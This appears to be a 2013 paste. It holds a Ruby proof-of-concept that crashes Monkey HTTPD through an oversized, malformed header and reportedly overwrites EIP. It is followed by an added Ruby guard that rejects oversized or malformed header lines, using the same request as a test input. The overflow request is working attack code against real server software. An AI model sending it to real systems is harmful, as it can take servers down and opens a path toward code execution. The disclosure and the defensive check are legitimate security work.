Untitled

a guest
May 30th, 2013
```ruby
#!/usr/bin/env ruby
#
# Demonstrates a buffer overflow in Monkey HTTPD <= 1.2.0
#
# The '\r\n' after the Host header seems to be necessary, as well as the
# 'localhost\r\n' after it. On my system, the offset of 2511 overwrites eip
# perfectly with 'BBBB'. I wasn't able to exploit this further, but it might
# be possible.

require 'socket'

host = 'localhost'
port = 2001

s = TCPSocket.open(host, port)

# Build the malformed request: a bare "Host:" line, a continuation line,
# then an oversized "Bad:" header (2511 filler bytes followed by 4 marker bytes)
buf = "GET / HTTP/1.1\r\n"
buf << "Host: " + "\r\n"
buf << "localhost\r\n"
buf << "Bad: "
buf << "A" * 2511
buf << "B" * 4
buf << "\r\n\r\n\r\n"

s.puts(buf)
s.close
```
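The paste shows the shape of the request that crashes the server: an oversized header line plus a header block that is not well-formed. The following is an added example, not part of the paste and not Monkey HTTPD code, of the kind of pre-parse guard a reverse proxy or a hardened HTTP parser can apply before any header value reaches a fixed-size buffer. `MAX_HEADER_LINE` is an assumed limit chosen for illustration, not a value taken from Monkey HTTPD, and the two sample requests are constructed inline (the second mirrors the paste's request) rather than captured traffic.

```ruby
#!/usr/bin/env ruby
# Added example (not from the paste, not Monkey HTTPD code): reject requests
# whose header block is oversized or malformed before it is parsed.

# Assumed bound on a single header line; a real deployment picks its own.
MAX_HEADER_LINE = 1024

# Inspect the header block of a raw request (everything before the first
# blank CRLF line) and return a list of problems found:
#   [:too_long, line_index, byte_length]  a header line exceeds the limit
#   [:no_colon, line_index]               a header line has no "name: value" form
# The request line (index 0) is skipped here; it would get its own checks.
def header_problems(raw, limit = MAX_HEADER_LINE)
  header_block = raw.split("\r\n\r\n", 2).first || ""
  lines = header_block.split("\r\n")
  problems = []
  lines.each_with_index do |line, i|
    next if i.zero?
    problems << [:too_long, i, line.bytesize] if line.bytesize > limit
    problems << [:no_colon, i] unless line.include?(":")
  end
  problems
end

# A request is rejected outright when any problem is present, so the
# downstream parser never copies an oversized or malformed line.
def reject_request?(raw, limit = MAX_HEADER_LINE)
  !header_problems(raw, limit).empty?
end

# Constructed sample inputs (not captured traffic).
NORMAL_REQUEST = "GET / HTTP/1.1\r\nHost: localhost\r\nUser-Agent: test\r\n\r\n"
LONG_HEADER_REQUEST =
  "GET / HTTP/1.1\r\n" \
  "Host: \r\n" \
  "localhost\r\n" \
  "Bad: " + ("A" * 2511) + ("B" * 4) + "\r\n\r\n\r\n"

if __FILE__ == $0
  [NORMAL_REQUEST, LONG_HEADER_REQUEST].each do |req|
    verdict = reject_request?(req) ? "REJECT" : "accept"
    puts "#{req.bytesize} bytes -> #{verdict} #{header_problems(req).inspect}"
  end
end
```

Run on the constructed inputs, the normal request yields no problems, while the paste-shaped request is flagged twice: the bare `localhost` continuation line has no colon, and the `Bad:` line is 2520 bytes. Either finding is enough to drop the request at the edge, and logging the line index and length gives an operator a concrete signal to alert on.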